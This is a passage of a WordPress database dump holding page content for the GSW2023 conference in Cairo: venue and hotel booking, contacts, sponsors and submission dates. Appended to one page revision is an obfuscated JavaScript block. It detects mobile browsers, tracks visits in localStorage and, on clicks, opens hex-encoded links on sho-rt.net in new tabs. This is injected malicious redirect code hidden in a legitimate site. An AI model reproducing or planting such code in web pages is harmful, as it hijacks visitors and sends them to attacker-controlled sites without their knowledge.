link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:32:36','2023-05-17 04:32:36','',3066,'https://gsw2023.com/?p=4513',0,'revision','',0),
(4514,1,'2023-05-17 04:37:56','2023-05-17 04:37:56','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 